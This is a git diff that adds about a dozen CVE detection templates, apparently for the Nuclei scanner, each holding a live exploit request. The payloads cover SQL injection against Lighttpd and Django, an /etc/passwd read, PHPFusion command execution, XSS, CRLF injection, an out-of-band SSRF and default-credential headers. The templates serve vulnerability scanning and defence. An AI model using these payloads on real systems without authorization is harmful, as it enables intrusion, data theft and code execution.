diff --git a/cves/2014/CVE-2014-2323.yaml b/cves/2014/CVE-2014-2323.yaml
new file mode 100644
index 0000000000..e4dff03126
--- /dev/null
+++ b/cves/2014/CVE-2014-2323.yaml
@@ -0,0 +1,21 @@
+id: CVE-2014-2323
+
+info:
+ name: Lighttpd 1.4.34 SQL injection and path traversal
+ description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.
+ reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
+ author: geeknik
+ severity: critical
+ tags: cve,cve2014,sqli,lighttpd
+
+requests:
+ - raw:
+ - |+
+ GET /etc/passwd HTTP/1.1
+ Host: [::1]' UNION SELECT '/
+
+ unsafe: true
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
diff --git a/cves/2016/CVE-2016-0957.yaml b/cves/2016/CVE-2016-0957.yaml
new file mode 100644
index 0000000000..8dc7b5b7e6
--- /dev/null
+++ b/cves/2016/CVE-2016-0957.yaml
@@ -0,0 +1,28 @@
+id: CVE-2016-0957
+
+info:
+ name: Adobe AEM Console Disclosure
+ author: geeknik
+ description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
+ reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
+ severity: high
+ tags: cve,cve2016,adobe,aem
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/system/console?.css"
+ header:
+ - Authorization: "Basic YWRtaW46YWRtaW4K"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "Adobe"
+ - "java.lang"
+ - "(Runtime)"
+ condition: and
diff --git a/cves/2018/CVE-2018-1000600.yaml b/cves/2018/CVE-2018-1000600.yaml
new file mode 100644
index 0000000000..5b5e68d0d7
--- /dev/null
+++ b/cves/2018/CVE-2018-1000600.yaml
@@ -0,0 +1,22 @@
+id: CVE-2018-1000600
+
+info:
+ name: Pre-auth Fully-responded SSRF
+ description: A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
+ reference:
+ - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
+ - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
+ author: geeknik
+ severity: medium
+ tags: cve,cve2018,jenkins,ssrf,oob
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-24949.yaml b/cves/2020/CVE-2020-24949.yaml
new file mode 100644
index 0000000000..9b973fef67
--- /dev/null
+++ b/cves/2020/CVE-2020-24949.yaml
@@ -0,0 +1,26 @@
+id: CVE-2020-24949
+
+info:
+ name: PHPFusion 9.03.50 Remote Code Execution
+ author: geeknik
+ severity: high
+ description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).
+ reference: https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt
+ tags: cve,cve2020,phpfusion,rce,php
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"
+
+ matchers-condition: and
+ matchers:
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - "infusion_db.php"
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-9402.yaml b/cves/2020/CVE-2020-9402.yaml
new file mode 100644
index 0000000000..fce8b70603
--- /dev/null
+++ b/cves/2020/CVE-2020-9402.yaml
@@ -0,0 +1,26 @@
+id: CVE-2020-9402
+
+info:
+ name: Django SQL Injection
+ description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL.
+ reference: |
+ - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402
+ - https://docs.djangoproject.com/en/3.0/releases/security/
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-9402
+ author: geeknik
+ severity: high
+ tags: cve,cve2020,django,sqli
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"
+
+ matchers:
+ - type: word
+ words:
+ - "DatabaseError at"
+ - "ORA-29257:"
+ - "ORA-06512:"
+ - "Request Method:"
+ condition: and
diff --git a/cves/2021/CVE-2021-24291.yaml b/cves/2021/CVE-2021-24291.yaml
new file mode 100644
index 0000000000..3d7e73cfbc
--- /dev/null
+++ b/cves/2021/CVE-2021-24291.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-24291
+
+info:
+ name: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS)
+ author: geeknik
+ description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)
+ reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a
+ severity: medium
+ tags: cve,cve2021,xss,wordpress,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: word
+ words:
+ - "onmouseover=alert(document.domain)//"
+ - "wp-content/uploads/photo-gallery"
+ condition: and
diff --git a/cves/2021/CVE-2021-31249.yaml b/cves/2021/CVE-2021-31249.yaml
new file mode 100644
index 0000000000..64112f9e82
--- /dev/null
+++ b/cves/2021/CVE-2021-31249.yaml
@@ -0,0 +1,26 @@
+id: CVE-2021-31249
+
+info:
+ name: CHIYU TCP/IP Converter devices - CRLF injection
+ author: geeknik
+ description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components.
+ reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249
+ severity: medium
+ tags: cve,cve2021,chiyu,crlf,iot
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 302
+ - type: word
+ part: header
+ words:
+ - "Location: setting.htm"
+ - ""
+ condition: and
diff --git a/cves/2021/CVE-2021-31250.yaml b/cves/2021/CVE-2021-31250.yaml
new file mode 100644
index 0000000000..f03536d032
--- /dev/null
+++ b/cves/2021/CVE-2021-31250.yaml
@@ -0,0 +1,28 @@
+id: CVE-2021-31250
+
+info:
+ name: CHIYU IoT XSS
+ author: geeknik
+ description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.
+ reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
+ severity: medium
+ tags: cve,cve2021,chiyu,xss,iot
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"
+ headers:
+ Authorization: "Basic OmFkbWlu"
+
+ redirects: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "text/html"
+ - type: word
+ part: body
+ words:
+ - "\">"
diff --git a/cves/2021/CVE-2021-31581.yaml b/cves/2021/CVE-2021-31581.yaml
new file mode 100644
index 0000000000..d1ae4aeb7e
--- /dev/null
+++ b/cves/2021/CVE-2021-31581.yaml
@@ -0,0 +1,27 @@
+id: CVE-2021-31581
+
+info:
+ name: Akkadian Provisioning Manager MariaDB Credentials
+ author: geeknik
+ reference:
+ - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/
+ - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/
+ severity: medium
+ tags: cve,cve2021,akkadian,mariadb,disclosure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/pme/database/pme/phinx.yml"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "host:"
+ - "name:"
+ - "pass:"
+ condition: and
diff --git a/cves/2021/CVE-2021-33221.yaml b/cves/2021/CVE-2021-33221.yaml
new file mode 100644
index 0000000000..0426b0eee2
--- /dev/null
+++ b/cves/2021/CVE-2021-33221.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-33221
+
+info:
+ name: CommScope Ruckus IoT Controller Unauthenticated Service Details
+ author: geeknik
+ description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices uses for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).
+ reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
+ severity: medium
+ tags: cve,cve2021,commscope,ruckus,debug
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/service/v1/service-details"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "application/json"
+ - type: word
+ words:
+ - "message"
+ - "ok"
+ - "data"
+ - "dns"
+ - "gateway"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml
new file mode 100644
index 0000000000..74213022a3
--- /dev/null
+++ b/cves/2021/CVE-2021-3377.yaml
@@ -0,0 +1,29 @@
+id: CVE-2021-3377
+
+info:
+ name: Ansi_up XSS
+ description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.
+ reference: |
+ - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
+ - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
+ author: geeknik
+ severity: medium
+
+requests:
+ - raw:
+ - |+
+ GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+
+ unsafe: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: word
+ words:
+ - "com\"/onmouseover=\"alert(1)\">"
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-33904.yaml b/cves/2021/CVE-2021-33904.yaml
new file mode 100644
index 0000000000..cdb7130cd7
--- /dev/null
+++ b/cves/2021/CVE-2021-33904.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-33904
+
+info:
+ name: Accela Civic Platform 21.1 - 'servProvCode' XSS
+ author: geeknik
+ description: In Accela Civic Platform through 21.1, the security/hostSignon.do parameter servProvCode is vulnerable to XSS.
+ reference: https://www.exploit-db.com/exploits/49980
+ severity: medium
+ tags: cve,cve2021,accela,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: word
+ words:
+ - '"k3woq"^confirm(document.domain)^"a2pbrnzx5a9"'
+ - 'servProvCode'
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file